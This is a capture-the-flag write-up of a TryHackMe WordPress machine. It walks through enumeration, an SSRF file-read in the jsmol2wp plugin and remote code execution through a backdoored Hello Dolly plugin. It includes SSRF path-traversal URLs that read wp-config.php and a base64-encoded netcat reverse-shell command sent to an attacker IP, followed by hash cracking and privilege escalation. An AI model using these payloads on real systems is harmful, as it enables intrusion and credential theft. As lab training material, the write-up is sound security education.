Smol

Test your enumeration skills on this boot-to-root machine.

SmolTryHackMe

Recon

We begin with an Nmap scan and discover only two open ports: 22 (SSH) and 80 (HTTP).

┌──(kali㉿kali)-[~]
└─$ nmap -p- smol.thm -T4                               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 11:34 IST
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 0.44% done
Stats: 0:00:13 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 1.19% done; ETC: 11:53 (0:19:27 remaining)
Stats: 0:03:11 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 22.90% done; ETC: 11:47 (0:10:43 remaining)
Warning: 10.10.167.60 giving up on port because retransmission cap hit (6).
Nmap scan report for smol.thm (10.10.167.60)
Host is up (0.15s latency).
Not shown: 65527 closed tcp ports (conn-refused)
PORT      STATE    SERVICE
22/tcp    open     ssh
80/tcp    open     http

Nmap done: 1 IP address (1 host up) scanned in 834.82 seconds
                                                                                                                                                                                                                                            
┌──(kali㉿kali)-[~]
└─$ nmap -sC -sV -sT -p 22,80 smol.thm -T4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-24 11:59 IST
Nmap scan report for smol.thm (10.10.167.60)
Host is up (0.15s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 44:5f:26:67:4b:4a:91:9b:59:7a:95:59:c8:4c:2e:04 (RSA)
|   256 0a:4b:b9:b1:77:d2:48:79:fc:2f:8a:3d:64:3a:ad:94 (ECDSA)
|_  256 d3:3b:97:ea:54:bc:41:4d:03:39:f6:8f:ad:b6:a0:fb (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Did not follow redirect to http://www.smol.thm/
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.67 seconds

We have an SSH server running on 22 and a web server on port 80.

Upon accessing the site, we are redirected to www.smol.thm. To proceed, we need to add this domain to our /etc/hosts file.

The page appears minimalistic, featuring only static links. However, as we later discover, it provides all the necessary information to achieve Remote Code Execution (RCE). The topics covered include XSS, SSRF, and RCE.

We attempted to discover additional virtual hosts using ffuf, but none were found.

The Feroxbuster directory scan reveals that the site runs WordPress, as indicated by directories like /wp-content/. Additionally, we discover the Smol plugin, which appears to be the namesake of the room.

feroxbuster -u 'http://www.smol.thm' -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt

We proceed with a WPScan, using an API key to generate a detailed report, including CVEs for detected vulnerabilities. A free API key can be obtained from wpscan.com.

wpscan --url http://www.smol.thm --api-token [Your_Token]

┌──(kali㉿kali)-[~]
└─$ wpscan --url http://www.smol.thm --api-token [Your Token]
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.25
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.

[+] URL: http://www.smol.thm/ [10.10.167.60]
[+] Started: Mon Feb 24 12:25:16 2025

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://www.smol.thm/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://www.smol.thm/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://www.smol.thm/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://www.smol.thm/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

Fingerprinting the version - Time: 00:00:22 <===========================================================================================================================================================> (702 / 702) 100.00% Time: 00:00:22
[i] The WordPress version could not be detected.

[+] WordPress theme in use: twentytwentythree
 | Location: http://www.smol.thm/wp-content/themes/twentytwentythree/
 | Last Updated: 2024-11-13T00:00:00.000Z
 | Readme: http://www.smol.thm/wp-content/themes/twentytwentythree/readme.txt
 | [!] The version is out of date, the latest version is 1.6
 | [!] Directory listing is enabled
 | Style URL: http://www.smol.thm/wp-content/themes/twentytwentythree/style.css
 | Style Name: Twenty Twenty-Three
 | Style URI: https://wordpress.org/themes/twentytwentythree
 | Description: Twenty Twenty-Three is designed to take advantage of the new design tools introduced in WordPress 6....
 | Author: the WordPress team
 | Author URI: https://wordpress.org
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.2 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://www.smol.thm/wp-content/themes/twentytwentythree/style.css, Match: 'Version: 1.2'

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] jsmol2wp
 | Location: http://www.smol.thm/wp-content/plugins/jsmol2wp/
 | Latest Version: 1.07 (up to date)
 | Last Updated: 2018-03-09T10:28:00.000Z
 |
 | Found By: Urls In Homepage (Passive Detection)
 |
 | [!] 2 vulnerabilities identified:
 |
 | [!] Title: JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)
 |     References:
 |      - https://wpscan.com/vulnerability/0bbf1542-6e00-4a68-97f6-48a7790d1c3e
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20462
 |      - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
 |
 | [!] Title: JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)
 |     References:
 |      - https://wpscan.com/vulnerability/ad01dad9-12ff-404f-8718-9ebbd67bf611
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20463
 |      - https://www.cbiu.cc/2018/12/WordPress%E6%8F%92%E4%BB%B6jsmol2wp%E6%BC%8F%E6%B4%9E/#%E5%8F%8D%E5%B0%84%E6%80%A7XSS
 |
 | Version: 1.07 (100% confidence)
 | Found By: Readme - Stable Tag (Aggressive Detection)
 |  - http://www.smol.thm/wp-content/plugins/jsmol2wp/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://www.smol.thm/wp-content/plugins/jsmol2wp/readme.txt

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:04 <=============================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:04

[i] No Config Backups Found.

[+] WPScan DB API OK
 | Plan: free
 | Requests Done (during the scan): 2
 | Requests Remaining: 23

[+] Finished: Mon Feb 24 12:27:27 2025
[+] Requests Done: 1457
[+] Cached Requests: 7
[+] Data Sent: 389.604 KB
[+] Data Received: 43.066 MB
[+] Memory used: 256.41 MB
[+] Elapsed time: 00:02:10

We identify two vulnerabilities in Smol: one allowing XSS and another enabling SSRF to read system data. The WPScan report provides PoC payloads, requiring only minor adjustments to the host.

XSS

Title: JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)

JSmol2WP <= 1.07 - Unauthenticated Cross-Site Scripting (XSS)WPScan

SSRF

Title: JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)

JSmol2WP <= 1.07 - Unauthenticated Server Side Request Forgery (SSRF)WPScan

Initial Access

Using the SSRF payload, we successfully retrieve wp-config.php, which contains database credentials for the user wpuser.

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../../../wp-config.php

We use those credentials to login as wpuser.

Under Pages we find unpublished pages.

Here, we are dealing with Dolly, a plugin that revises code, it's worth inspecting its source code for potential vulnerabilities or backdoors.

We can examine the original Dolly plugin, which includes a hello.php file. We should search for this file to analyze its contents and identify any potential vulnerabilities or modifications.

GitHub - WordPress/hello-dolly: This is not just a plugin, it symbolizes the hope and enthusiasm of an entire generation summed up in two words sung most famously by Louis Armstrong.GitHub

We use the SSRF vulnerability again and read the hello.php file.

http://www.smol.thm/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=../../hello.php

The eval PHP command stands out immediately, indicating potential security risks. The command is Base64-encoded, likely as an attempt at security through obscurity, which is ineffective. We can decode the Base64 string to analyze its actual functionality.

We decode using Cyberchef and see a part encoded again.

Decoding \143\x6d\144 gives us 'cmd'.

By calling hello_dolly(), we might be able to pass a cmd parameter and achieve remote code execution (RCE). To test this, we prepare a reverse shell using busybox, then encode the payload in Base64 to bypass potential input filtering.

www-data

After some trial and error, we successfully execute commands via index.php?cmd. We pass our Base64-encoded reverse shell, ensuring our listener is set up beforehand. We get a shell back as www-data, but there's no flag in sight yet.

http://www.smol.thm/wp-admin/index.php?cmd=echo YnVzeWJveCBuYyAxMC4xNy4xNS4xNTUgMTMzNyAtZSAvYmluL2Jhc2g= | base64 -d | bash

Since we have the database user credentials, we check the database for any useful information.

We extract the hashes and attempt to crack them using hashcat or John the Ripper.

diego

With the cracked password, we switch to the user Diego using su and locate the first flag in Diego's home directory.

Privilege Escalation

think

Checking the home directory permissions, we see that the "internal" group has read access. Since Diego is part of this group, we can read files within other users' home directories.

This allows us to read Think's SSH key, which we can use to switch to their user account.

We copy the key to our machine, adjust the permissions, and use it to log in as Think via SSH.

gege

Since only Gege has read permissions for the zip file, we need to find a way to access its contents. This old WordPress instance might contain useful credentials or configuration files that could help us move laterally.

Since we can switch to Gege using su, we now have access to the zip file in their home directory. The reason behind this unintended privilege escalation is due to a misconfiguration in /etc/pam.d/su.

xavi

Now that we have access as Gege, we can retrieve the wordpress.old.zip file. This archived instance of WordPress might contain old credentials, configuration files, or other sensitive data that could help us escalate further.

This is password encrypted.

We use zip2john to generate a hash.

zip2john wordpress.old.zip > hash.txt

We can now crack it using john with rockyout.txt.

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

The old wp-config.php file contains database credentials for the user xavi, who also exists on the system. We can try switching to this user using su .

We can switch to the xavi user using su. Now, we can explore their home directory and check for further privilege escalation opportunities.

root

Since xavi has unrestricted sudo privileges, we can escalate to root by simply running:

sudo su

Now, we have full control over the system. We navigate to /root and retrieve the final flag.